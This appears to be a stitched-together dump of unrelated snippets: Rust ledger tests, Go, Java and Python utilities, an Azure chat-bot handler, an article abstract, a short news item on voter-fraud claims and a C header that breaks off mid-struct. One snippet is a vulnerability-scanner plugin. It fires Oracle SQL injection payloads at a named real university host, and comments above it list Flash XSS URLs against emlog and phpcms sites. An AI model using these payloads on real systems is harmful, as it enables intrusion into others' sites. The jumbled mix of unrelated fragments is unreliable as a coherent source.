// 1. Create and open pool
// 2. Create and open wallet
// 3. Generate did from Trustee seed
let (wallet_handle, pool_handle, trustee_did, wallet_config) = utils::setup_trustee("indy_replace_keys_demo");
// 4. Generate my did
let (my_did, my_verkey) = did::create_my_did(wallet_handle, "{}").unwrap();
// 5. Send Nym request to Ledger
let nym_request = ledger::build_nym_request(&trustee_did, &my_did, Some(&my_verkey), None, None).unwrap();
ledger::sign_and_submit_request(pool_handle, wallet_handle, &trustee_did, &nym_request).unwrap();
// 6. Start replacing of keys
let new_verkey = did::replace_keys_start(wallet_handle, &my_did, "{}").unwrap();
// 7. Send Nym request to Ledger with new verkey
let nym_request = ledger::build_nym_request(&my_did, &my_did, Some(&new_verkey), None, None).unwrap();
ledger::sign_and_submit_request(pool_handle, wallet_handle, &my_did, &nym_request).unwrap();
// 8. Send Schema request before apply replacing of keys
let schema_request = ledger::build_schema_request(&my_did, SCHEMA_DATA).unwrap();
let response = ledger::sign_and_submit_request(pool_handle, wallet_handle, &my_did, &schema_request).unwrap();
pool::check_response_type(&response, ResponseType::REQNACK);
// 9. Apply replacing of keys
did::replace_keys_apply(wallet_handle, &my_did).unwrap();
// 10. Send Schema request
ledger::sign_and_submit_request(pool_handle, wallet_handle, &my_did, &schema_request).unwrap();
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_replace_keys_demo", &wallet_config);
}
#[test]
fn indy_replace_keys_without_nym_transaction() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_replace_keys_without_nym_transaction");
let (my_did, _) = did::create_store_and_publish_my_did_from_trustee(wallet_handle, pool_handle).unwrap();
did::replace_keys_start(wallet_handle, &my_did, "{}").unwrap();
did::replace_keys_apply(wallet_handle, &my_did).unwrap();
let schema_request = ledger::build_schema_request(&my_did, SCHEMA_DATA).unwrap();
let response = ledger::sign_and_submit_request(pool_handle, wallet_handle, &my_did, &schema_request).unwrap();
pool::check_response_type(&response, ResponseType::REQNACK);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_replace_keys_without_nym_transaction", &wallet_config);
}
}
mod abbreviate_verkey {
use super::*;
#[test]
fn indy_abbreviate_verkey_works_for_abbr_key() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_abbreviate_verkey_works_for_abbr_key");
let (did, verkey) = did::create_my_did(wallet_handle, "{}").unwrap();
let abbr_verkey = did::abbreviate_verkey(&did, &verkey).unwrap();
assert_ne!(verkey, abbr_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_abbreviate_verkey_works_for_abbr_key", &wallet_config);
}
#[test]
fn indy_abbreviate_verkey_works_for_not_abbr_key() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_abbreviate_verkey_works_for_not_abbr_key");
let (did, verkey) = did::create_my_did(wallet_handle, &format!(r#"{{"did":{:?}}}"#, DID_TRUSTEE)).unwrap();
let full_verkey = did::abbreviate_verkey(&did, &verkey).unwrap();
assert_eq!(verkey, full_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_abbreviate_verkey_works_for_not_abbr_key", &wallet_config);
}
#[test]
fn indy_abbreviate_verkey_works_for_invalid_did() {
let res = did::abbreviate_verkey(INVALID_BASE58_DID, VERKEY_TRUSTEE);
assert_code!(ErrorCode::CommonInvalidStructure, res);
}
#[test]
fn indy_abbreviate_verkey_works_for_invalid_verkey() {
let res = did::abbreviate_verkey(DID_TRUSTEE, INVALID_BASE58_VERKEY);
assert_code!(ErrorCode::CommonInvalidStructure, res);
}
}
}
|
package main
type RegFile [32]uint32
func (r *RegFile) Read(address uint8) uint32 {
return r[address]
}
func (r *RegFile) Write(address uint8, data uint32) {
if address != 0 {
r[address] = data
}
}
|
<reponame>csadsl/poc_exp
#http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/bugscan/%29}}//
#http://www.phpcms.cn/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf%26stream%3D%5C%2522%29%29%7Dcatch%28e%29%7Balert%281%29%7D%2f%2f
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = qianhao sqli
#__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-065322
import re
def assign(service, arg):
if service == 'dalianqianhao':
return True, arg
def audit(arg):
payload = 'ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2'
target = arg + payload
posts = ["bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1)%20and%201=utl_inaddr.get_host_address('hen'||'tai')%20and%20(1=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=130112&YearTermNO=16",
"bt_DYXZ=%b4%f2%d3%a1%d1%a1%d6%d0&bt_FXXD=%b7%b4%cf%f2%d1%a1%b6%a8&bt_QBCX=%c8%ab%b2%bf%b3%b7%cf%fa&bt_QBXZ=%c8%ab%b2%bf%d1%a1%d6%d0&CourseModeID=1&ReportTitle=%b9%fe%b6%fb%b1%f5%c9%cc%d2%b5%b4%f3%d1%a72014-2015%d1%a7%c4%ea%b5%da%b6%fe%d1%a7%c6%da%c9%cf%bf%ce%d1%a7%c9%fa%c3%fb%b5%a5&ScheduleSwitch=0&TeacherNO=1&YearTermNO=1%20and%201=utl_inaddr.get_host_address('hen'||'tai')"]
for post in posts:
code, head, body, errcode, final_url = curl.curl2(target, post=post);
if code == 200 and 'hentai' in body:
security_warning(target+' has post inject')
if __name__ == '__main__':
from dummy import *
audit(assign('dalianqianhao', 'http://cityjw.dlut.edu.cn:7001/')[1]) |
/**
* Adds a new event manager to the system.
*/
public void addManager(FunctionManager<T, S> functionManager) {
FunctionAPIIdentifier eventManagerID = functionManager.getID();
functionManagerMap.put(eventManagerID, functionManager);
functionManager.markDirty();
if (this.disabled) {
functionManager.disable();
}
} |
// SetTLSConfig sets the TLS configuration of client.
func (c *Client) SetTLSConfig(tlsConfig *tls.Config) error {
if v, ok := c.Transport.(*http.Transport); ok {
v.TLSClientConfig = tlsConfig
return nil
}
return gerror.NewCode(gerror.CodeInternalError, `cannot set TLSClientConfig for custom Transport of the client`)
} |
/**
* remove a listener
* @param listenerToRemove to remove
* @return the spring for chaining
*/
public Spring removeListener(SpringListener listenerToRemove) {
if (listenerToRemove == null) {
throw new IllegalArgumentException("listenerToRemove is required");
}
mListeners.remove(listenerToRemove);
return this;
} |
The practice of organizing public hearings on the development of territories in municipalities of the Moscow region
The article examines the practice of organizing public hearings on the development of territories on the example of urban districts of the Moscow region. The strengths and weaknesses of organizing public hearings on the development of these urban districts are presented. The stages, structure and procedure for organizing public hearings, the regulatory framework and the specifics of decision-making based on the results of the hearings are considered. The article is presented in the form of a socio-economic section with an emphasis on the financial component of the municipalities of the Moscow region. Common mistakes and problems encountered in organizing and conducting public hearings are indicated. Practical recommendations on the fundamental and technical part of holding public hearings on the development of territories in the municipalities of the Moscow region are presented. Much attention is paid to interested and responsible persons on the development of territories and the organization of public hearings. This material can be useful in organizing and conducting public hearings on the territory of municipalities both in the Moscow region and in other regions of the Russian Federation. Also, the article can be useful in building a tripartite constructive dialogue between society, business and state and municipal authorities. |
def _prepare_matrices_for_transitions(self):
P = self.trigger.P
M = self.M
Q = self.Q
dP = {k: m.T @ P @ m - P for k, m in M.items()}
self._dP = dP
MQM = {(i, j): mi.T @ qj @ mi
for i, mi in M.items() for j, qj in Q.items()}
if self.trigger.threshold == 0.0:
MQM = {x: mqm / la.norm(mqm) for x, mqm in MQM.items()}
self._MQM = MQM |
// Ready checks whether all the process' ports are connected
func (p *BaseProcess) Ready() (isReady bool) {
isReady = true
for portName, port := range p.inPorts {
if !port.Ready() {
Error.Printf("InPort %s of process %s is not connected - check your workflow code!\n", portName, p.name)
isReady = false
}
}
for portName, port := range p.outPorts {
if !port.Ready() {
Error.Printf("OutPort %s of process %s is not connected - check your workflow code!\n", portName, p.name)
isReady = false
}
}
for portName, port := range p.inParamPorts {
if !port.Ready() {
Error.Printf("InParamPort %s of process %s is not connected - check your workflow code!\n", portName, p.name)
isReady = false
}
}
for portName, port := range p.outParamPorts {
if !port.Ready() {
Error.Printf("OutParamPort %s of process %s is not connected - check your workflow code!\n", portName, p.name)
isReady = false
}
}
return isReady
} |
<reponame>dan-obrien/sdx-deliver<filename>app/secret_manager.py
from google.cloud import secretmanager
import structlog
logger = structlog.get_logger()
def get_secret(project_id: str, secret_id: str) -> bytes:
"""
Makes API call to Google Secret Manager, retrieving secret.
"""
logger.info("Getting secrets from Secret Manager")
version_id = 'latest'
# Create the Secret Manager client.
client = secretmanager.SecretManagerServiceClient()
# Build the resource name of the secret version.
name = f"projects/{project_id}/secrets/{secret_id}/versions/{version_id}"
response = client.access_secret_version(request={"name": name})
payload = response.payload.data
return payload
|
<filename>genart/gen_photos.py
import tensorflow as tf
import numpy as np
from pathlib import Path
import re
import glob
def escape_path(p):
return str(p).encode('unicode-escape').decode()
class IndexedImageLoader:
def __init__(self, format, expected_shape=None):
self.format = Path(format)
self.expected_shape = expected_shape
fglob = str(self.format).format(index='*')
self.image_files = [ Path(p) for p in glob.glob(fglob) ]
self.idxs = []
for im in self.image_files:
toks = re.split('[.\\\\-]+', str(im))
self.idxs.append(int(toks[-3]))
self.idxs = sorted(self.idxs)
def __len__(self):
return len(self.idxs)
def square_image(self, image):
short_size = min(image.shape[0], image.shape[1])
return image[:short_size, :short_size, :]
def load_image(self, i=None, idx=None, square=True):
if idx is None:
if i is None:
raise KeyError("not sure what I'm doing")
idx = self.idxs[i]
f = tf.io.read_file(str(self.format).format(index="{0:05d}".format(idx)))
image = (tf.cast(tf.image.decode_jpeg(f), tf.float32) / 127.5) - 1.0
if square:
image = self.square_image(image)
if self.expected_shape:
if image.shape[0] != self.expected_shape[0] or image.shape[1] != self.expected_shape[1]:
raise ValueError("bad shape")
return image
def __getitem__(self, idx):
if isinstance(idx, slice):
imgs = []
for i in range(*idx.indices(len(self))):
try:
imgs.append(self.load_image(i))
except ValueError as e:
pass
return tf.stack(imgs)
else:
return self.load_image(idx)[tf.newaxis,:,:,:]
def load_patch(self, i, shape):
im = self.load_image(i=i, square=True)
start = np.array([ np.random.randint(0, im.shape[0] - shape[0]),
np.random.randint(0, im.shape[1] - shape[1]) ])
return im[start[0]:start[0]+shape[0],
start[1]:start[1]+shape[1],:]
def iter_patch(self, shape, batch_size):
for i in range(0, len(self.idxs), batch_size):
start_i = i
end_i = min(i + batch_size, len(self.idxs))
imgs = []
for ii in range(start_i, end_i):
img = self.load_patch(ii, shape)
imgs.append(img)
yield tf.stack(imgs)
class PairedImageLoader:
def __init__(self, set_1_format, set_2_format):
self.s1_loader = IndexedImageLoader(set_1_format)
self.s2_loader = IndexedImageLoader(set_2_format)
self.idxs = sorted(list(set(self.s1_loader.idxs) & set(self.s2_loader.idxs)))
self.small_shape = (128,128,3)
def __len__(self):
return len(self.idxs)
def load_image_pair(self, i=None, idx=None, square=True):
if idx is None:
if i is None:
raise KeyError("not sure what I'm doing")
idx = self.idxs[i]
return self.s1_loader.load_image(idx=idx, square=square), self.s2_loader.load_image(idx=idx, square=square)
def load_patch_pair(self, i, shp1):
im1, im2 = self.load_image_pair(i=i, square=True)
sf = im2.shape[0] // im1.shape[0]
shp2 = (shp1[0]*sf, shp1[1]*sf)
start1 = np.array([ np.random.randint(0, im1.shape[0] - shp1[0]), np.random.randint(0, im1.shape[1] - shp1[1]) ])
start2 = start1 * sf
return (
im1[start1[0]:start1[0]+shp1[0],
start1[1]:start1[1]+shp1[1],:],
im2[start2[0]:start2[0]+shp2[0],
start2[1]:start2[1]+shp2[1],:]
)
def iter_patch_pair(self, shape, batch_size):
for i in range(0, len(self.idxs), batch_size):
start_i = i
end_i = min(i + batch_size, len(self.idxs))
imgs = []
for ii in range(start_i, end_i):
imgs.append(self.load_patch_pair(ii, shape))
yield tf.stack([im[0] for im in imgs]), tf.stack([im[1] for im in imgs])
if __name__ == '__main__':
imdl = PairedImageLoader('images/small/img-small-{index}.jpg', 'images/large/img-large-{index}.jpg')
im1,im2 = imdl.load_image_pair_patch(0, (128,128))
print(im1.shape, im2.shape)
#print(imdl.small_images)
|
import jsons, logging, sys
from oauth2client import client
import azure.functions as func
def main(req: func.HttpRequest) -> func.HttpResponse:
"""
Handle a request from Google Chat
@param req: The request object
@return: The response object
"""
logging.info('Python HTTP trigger function processed a request.')
try:
verify_auth(req.headers["authorization"])
except:
logging.exception('Unauthorized')
return func.HttpResponse("Unauthorized", status_code=401)
try:
event = req.get_json()
except:
logging.exception('Bad Request')
return func.HttpResponse("Bad Request", status_code=400)
try:
return func.HttpResponse(jsons.dumpb(handle_event(event)))
except:
logging.exception('Internal Server Error')
return func.HttpResponse("Internal Server Error", status_code=500)
def handle_event(event: object) -> object:
"""
Handles an event from Google Chat.
@param event: The event sent from chat.
@return: The object to respond with
"""
logging.info('Received an authenticated event: %s' % jsons.dumps(event))
if event['type'] == 'ADDED_TO_SPACE' and not event['space']['singleUserBotDm']:
text = 'Thanks for adding me to "%s"!' % (event['space']['displayName'] if event['space']['displayName'] else 'this chat')
elif event['type'] == 'MESSAGE':
text = 'You said: `%s`' % event['message']['text']
else:
return None
return {'text': text}
CHAT_ISSUER = '<EMAIL>'
PUBLIC_CERT_URL_PREFIX = 'https://www.googleapis.com/service_accounts/v1/metadata/x509/'
AUDIENCE = '{{AUDIENCE}}'
def verify_auth(bearer: str) -> None:
"""
This method asserts that the specified bearer token matches the expected deployment. If not, an exception is thrown.
@param bearer: The authorization string
@raise Error: If authorization fails
"""
token = client.verify_id_token(bearer.replace("Bearer ", "", 1), AUDIENCE, cert_uri=PUBLIC_CERT_URL_PREFIX + CHAT_ISSUER)
if token['iss'] != CHAT_ISSUER:
raise PermissionError()
|
- Texas is looking into claims of voter fraud in Tarrant County.
The investigation is focusing on mail-in ballots from the March primaries. Backers of stronger voter ID laws say this has been a problem for years.
“There were signatures, the same person’s signature multiple times… three or four different times, where it was painfully obvious that this wasn’t the same signature repeatedly,” said Tim O’Hare, the Tarrant County Republican Party chairman.
“He says he has proof of people marking ballots. I am not aware of any of that. You know, if we had it, we would investigate it because we want the election to be fair and honest,” said Deborah Peoples, the Democratic Party chairwoman in Tarrant County.
The Tarrant County elections administrator is not commenting on the issue.
Judge Glen Whitley told the Fort Worth Star Telegram the problem can be corrected by doing away with mail-in ballots. |
/**
*
* @author Pedro Gomes <[email protected]>
*
*/
public class PageSearchOverlapDatesTest extends WebDriverTestBaseParallel {
public PageSearchOverlapDatesTest(String os, String version, String browser, String deviceName,
String deviceOrientation) {
super(os, version, browser, deviceName, deviceOrientation);
}
@Test
@Retry
public void pageSearchOverlapDatesTest() throws Exception {
run("Search with fccn", () -> {
driver.findElement(By.id("submit-search-input")).clear();
driver.findElement(By.id("submit-search-input")).sendKeys("fccn");
driver.findElement(By.id("submit-search")).click();
});
run("Set start date to 20 May 1997", () -> DatePicker.setStartDatePicker(driver, "20/05/1997"));
run("Set end date to 22 August 1996", () -> DatePicker.setEndDatePicker(driver, "22/08/1996"));
appendError(() -> {
assertTrue("Check if it is possible to do date overlap: ", checkDatePicker());
});
}
private boolean checkDatePicker() {
String start = driver.findElement(By.id("start-date")).getAttribute("value");
String end = driver.findElement(By.id("end-date")).getAttribute("value");
try{
return (Integer.parseInt(start) <= Integer.parseInt(end));
} catch (Error e){
return false;
}
}
} |
#ifndef AUTOPILOTGLOBAL_TYPES_H
#define AUTOPILOTGLOBAL_TYPES_H
/*
* File: AutopilotGlobal_types.h
*
* Real-Time Workshop code generated for Simulink model AutopilotGlobal.
*
* Model version : 1.13
* Real-Time Workshop file version : 7.6.1 (R2010bSP1) 28-Jan-2011
* Real-Time Workshop file generated on : Wed May 09 11:35:02 2012
* TLC version : 7.6 (Jul 13 2010)
* C/C++ source code generated on : Wed May 09 11:35:02 2012
*
* Target selection: ert.tlc
* Embedded hardware selection: 32-bit Generic
* Code generation objectives: Unspecified
* Validation result: Not run
*/
#ifndef RTW_HEADER_AutopilotGlobal_types_h_
#define RTW_HEADER_AutopilotGlobal_types_h_
#include "rtwtypes.h"
#ifndef _DEFINED_TYPEDEF_FOR_TState_
#define _DEFINED_TYPEDEF_FOR_TState_
typedef struct {
uint32_T uiIdInterface;
uint32_T uiDataOk;
} TState;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAutonomOn_
#define _DEFINED_TYPEDEF_FOR_TAutonomOn_
typedef struct {
boolean_T bAutonomOn;
} TAutonomOn;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TALocalOn_
#define _DEFINED_TYPEDEF_FOR_TALocalOn_
typedef struct {
boolean_T bALocalOn;
} TALocalOn;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAutonomous_
#define _DEFINED_TYPEDEF_FOR_IAutonomous_
typedef struct {
TState state;
TAutonomOn autonomOn;
TALocalOn aLocalOn;
} IAutonomous;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TCmdFlags_
#define _DEFINED_TYPEDEF_FOR_TCmdFlags_
typedef struct {
boolean_T bFlag1;
boolean_T bFlag2;
boolean_T bFlag3;
boolean_T bFlag4;
boolean_T bFlag5;
boolean_T bFlag6;
boolean_T bFlag7;
boolean_T bFlag8;
} TCmdFlags;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_ICmdFlagsFw_
#define _DEFINED_TYPEDEF_FOR_ICmdFlagsFw_
typedef struct {
TState state;
TCmdFlags cmdFlagsFw;
} ICmdFlagsFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_ICmdFlagsMr_
#define _DEFINED_TYPEDEF_FOR_ICmdFlagsMr_
typedef struct {
TState state;
TCmdFlags cmdFlagsMr;
} ICmdFlagsMr;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_ICmdFlagsRw_
#define _DEFINED_TYPEDEF_FOR_ICmdFlagsRw_
typedef struct {
TState state;
TCmdFlags cmdFlagsRw;
} ICmdFlagsRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TDetect_
#define _DEFINED_TYPEDEF_FOR_TDetect_
typedef struct {
boolean_T bDetect;
} TDetect;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IDetectWp_
#define _DEFINED_TYPEDEF_FOR_IDetectWp_
typedef struct {
TState state;
TDetect detect;
} IDetectWp;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAccel_
#define _DEFINED_TYPEDEF_FOR_TAccel_
typedef struct {
real_T dAx;
real_T dAy;
real_T dAz;
} TAccel;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAccel_
#define _DEFINED_TYPEDEF_FOR_IAccel_
typedef struct {
TState state;
TAccel accel;
} IAccel;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAttitude_
#define _DEFINED_TYPEDEF_FOR_TAttitude_
typedef struct {
real_T dPhiEuler;
real_T dThetaEuler;
real_T dPsiEuler;
} TAttitude;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAttitude_
#define _DEFINED_TYPEDEF_FOR_IAttitude_
typedef struct {
TState state;
TAttitude attitude;
} IAttitude;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TBattery_
#define _DEFINED_TYPEDEF_FOR_TBattery_
typedef struct {
real32_T sVoltage;
real32_T sCurrent;
} TBattery;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IBattery_
#define _DEFINED_TYPEDEF_FOR_IBattery_
typedef struct {
TState state;
TBattery battery;
} IBattery;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPosRel_
#define _DEFINED_TYPEDEF_FOR_TPosRel_
typedef struct {
real_T dXRel;
real_T dYRel;
real_T dZRel;
} TPosRel;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TOrigin_
#define _DEFINED_TYPEDEF_FOR_TOrigin_
typedef struct {
real_T dLat0;
real_T dLon0;
real_T dHWgs0;
} TOrigin;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THAgl_
#define _DEFINED_TYPEDEF_FOR_THAgl_
typedef struct {
real_T dHAgl;
} THAgl;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THBarom_
#define _DEFINED_TYPEDEF_FOR_THBarom_
typedef struct {
real_T dHBarom;
} THBarom;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IPosRel_
#define _DEFINED_TYPEDEF_FOR_IPosRel_
typedef struct {
TState state;
TPosRel posRel;
TOrigin origin;
THAgl hAgl;
THBarom hBarom;
} IPosRel;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPosWgs_
#define _DEFINED_TYPEDEF_FOR_TPosWgs_
typedef struct {
real_T dLatWgs;
real_T dLonWgs;
real_T dHWgs;
} TPosWgs;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IPosWgs_
#define _DEFINED_TYPEDEF_FOR_IPosWgs_
typedef struct {
TState state;
TPosWgs posWgs;
THAgl hAgl;
} IPosWgs;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRates_
#define _DEFINED_TYPEDEF_FOR_TRates_
typedef struct {
real_T dRateP;
real_T dRateQ;
real_T dRateR;
} TRates;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IRates_
#define _DEFINED_TYPEDEF_FOR_IRates_
typedef struct {
TState state;
TRates rates;
} IRates;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelEarth_
#define _DEFINED_TYPEDEF_FOR_TVelEarth_
typedef struct {
real_T dVelNorth;
real_T dVelWest;
real_T dVelUp;
} TVelEarth;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IVelEarth_
#define _DEFINED_TYPEDEF_FOR_IVelEarth_
typedef struct {
TState state;
TVelEarth velEarth;
} IVelEarth;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_ITestbedMonitor_
#define _DEFINED_TYPEDEF_FOR_ITestbedMonitor_
typedef struct {
uint32_T quad_ID;
IPosRel iPosRel;
IVelEarth iVelEarth;
IAttitude iAttitude;
IBattery iBattery;
} ITestbedMonitor;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelAerodyn_
#define _DEFINED_TYPEDEF_FOR_TVelAerodyn_
typedef struct {
real_T dVelIas;
real_T dVelTas;
} TVelAerodyn;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IVelAerodyn_
#define _DEFINED_TYPEDEF_FOR_IVelAerodyn_
typedef struct {
TState state;
TVelAerodyn velAerodyn;
} IVelAerodyn;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelBody_
#define _DEFINED_TYPEDEF_FOR_TVelBody_
typedef struct {
real_T dVelU;
real_T dVelV;
real_T dVelW;
} TVelBody;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IVelBody_
#define _DEFINED_TYPEDEF_FOR_IVelBody_
typedef struct {
TState state;
TVelBody velBody;
} IVelBody;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TMode_
#define _DEFINED_TYPEDEF_FOR_TMode_
typedef struct {
uint8_T uiMode;
} TMode;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TWaypoints_
#define _DEFINED_TYPEDEF_FOR_TWaypoints_
typedef struct {
real_T dWp1Lat;
real_T dWp1Lon;
real_T dWp1H;
real_T dWp2Lat;
real_T dWp2Lon;
real_T dWp2H;
real_T dWp3Lat;
real_T dWp3Lon;
real_T dWp3H;
real_T dTypeWp;
real_T dRadius;
} TWaypoints;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelFlightPlan_
#define _DEFINED_TYPEDEF_FOR_TVelFlightPlan_
typedef struct {
real_T dVelFlightPlan;
} TVelFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THFlightPlan_
#define _DEFINED_TYPEDEF_FOR_THFlightPlan_
typedef struct {
real_T dHFlightPlan;
} THFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TCourseFlightPlan_
#define _DEFINED_TYPEDEF_FOR_TCourseFlightPlan_
typedef struct {
real_T dCourseFlightPlan;
} TCourseFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THeadingFlightPlan_
#define _DEFINED_TYPEDEF_FOR_THeadingFlightPlan_
typedef struct {
real_T dHeadingFlightPlan;
} THeadingFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IFlightPlan_
#define _DEFINED_TYPEDEF_FOR_IFlightPlan_
typedef struct {
TState state;
TMode modeFp;
TWaypoints waypoints;
TVelFlightPlan velFlightPlan;
THFlightPlan hFlightPlan;
TCourseFlightPlan courseFlightPlan;
THeadingFlightPlan headingFlightPlan;
} IFlightPlan;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefFwMode_
#define _DEFINED_TYPEDEF_FOR_TRefFwMode_
typedef struct {
uint8_T uiRefFwModeThrot;
uint8_T uiRefFwModeLon;
uint8_T uiRefFwModeLat;
} TRefFwMode;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefFw_
#define _DEFINED_TYPEDEF_FOR_TRefFw_
typedef struct {
real_T dRefFw1;
real_T dRefFw2;
real_T dRefFw3;
} TRefFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IRefFw_
#define _DEFINED_TYPEDEF_FOR_IRefFw_
typedef struct {
TState state;
TRefFwMode refFwMode;
TRefFw refFw;
} IRefFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefRwMode_
#define _DEFINED_TYPEDEF_FOR_TRefRwMode_
typedef struct {
uint8_T uiRefRwMode;
} TRefRwMode;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefPosRw_
#define _DEFINED_TYPEDEF_FOR_TRefPosRw_
typedef struct {
real_T dRefPosRw1;
real_T dRefPosRw2;
real_T dRefPosRw3;
real_T dRefPosRw4;
} TRefPosRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefVelRw_
#define _DEFINED_TYPEDEF_FOR_TRefVelRw_
typedef struct {
real_T dRefVelRw1;
real_T dRefVelRw2;
real_T dRefVelRw3;
real_T dRefVelRw4;
} TRefVelRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRefRpmRw_
#define _DEFINED_TYPEDEF_FOR_TRefRpmRw_
typedef struct {
real_T dRefRpmRw;
} TRefRpmRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IRefRw_
#define _DEFINED_TYPEDEF_FOR_IRefRw_
typedef struct {
TState state;
TRefRwMode refRwMode;
TRefPosRw refPosRw;
TRefVelRw refVelRw;
TRefRpmRw refRpmRw;
} IRefRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPStaAds_
#define _DEFINED_TYPEDEF_FOR_TPStaAds_
typedef struct {
real_T dPStaAds;
} TPStaAds;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPTotAds_
#define _DEFINED_TYPEDEF_FOR_TPTotAds_
typedef struct {
real_T dPTotAds;
} TPTotAds;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAds_
#define _DEFINED_TYPEDEF_FOR_IAds_
typedef struct {
TState state;
TPStaAds pStaAds;
TPTotAds pTotAds;
} IAds;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THAglAltim_
#define _DEFINED_TYPEDEF_FOR_THAglAltim_
typedef struct {
real_T dHAglAltim;
} THAglAltim;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IAltim_
#define _DEFINED_TYPEDEF_FOR_IAltim_
typedef struct {
TState state;
THAglAltim hAglAltim;
} IAltim;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPosGps_
#define _DEFINED_TYPEDEF_FOR_TPosGps_
typedef struct {
real_T dLatGps;
real_T dLonGps;
real_T dHWgsGps;
} TPosGps;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TVelGps_
#define _DEFINED_TYPEDEF_FOR_TVelGps_
typedef struct {
real_T dVelNorthGps;
real_T dVelEastGps;
real_T dVelDownGps;
} TVelGps;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IGps_
#define _DEFINED_TYPEDEF_FOR_IGps_
typedef struct {
TState state;
TPosGps posGps;
TVelGps velGps;
} IGps;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TRatesImu_
#define _DEFINED_TYPEDEF_FOR_TRatesImu_
typedef struct {
real_T dPImu;
real_T dQImu;
real_T dRImu;
} TRatesImu;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAccelImu_
#define _DEFINED_TYPEDEF_FOR_TAccelImu_
typedef struct {
real_T dAccelXImu;
real_T dAccelYImu;
real_T dAccelZImu;
} TAccelImu;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IImu_
#define _DEFINED_TYPEDEF_FOR_IImu_
typedef struct {
TState state;
TRatesImu ratesImu;
TAccelImu accelImu;
} IImu;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TMagField_
#define _DEFINED_TYPEDEF_FOR_TMagField_
typedef struct {
real_T dMagFieldX;
real_T dMagFieldY;
real_T dMagFieldZ;
} TMagField;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IMagnet_
#define _DEFINED_TYPEDEF_FOR_IMagnet_
typedef struct {
TState state;
TMagField magField;
} IMagnet;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPosVicon_
#define _DEFINED_TYPEDEF_FOR_TPosVicon_
typedef struct {
real_T dXVicon;
